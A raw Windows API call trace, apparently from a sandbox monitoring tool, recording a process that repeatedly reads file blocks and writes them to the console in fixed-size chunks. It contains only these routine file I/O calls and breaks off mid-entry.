1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.980] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.980] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.981] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.982] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.982] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.983] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] GetFileType (hFile=0x50) returned 0x1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.984] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.984] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.984] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.984] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] GetFileType (hFile=0x50) returned 0x1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] GetFileType (hFile=0x50) returned 0x1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] GetFileType (hFile=0x50) returned 0x1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.985] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.985] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.986] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.986] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.987] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.987] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] GetFileType (hFile=0x50) returned 0x1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] 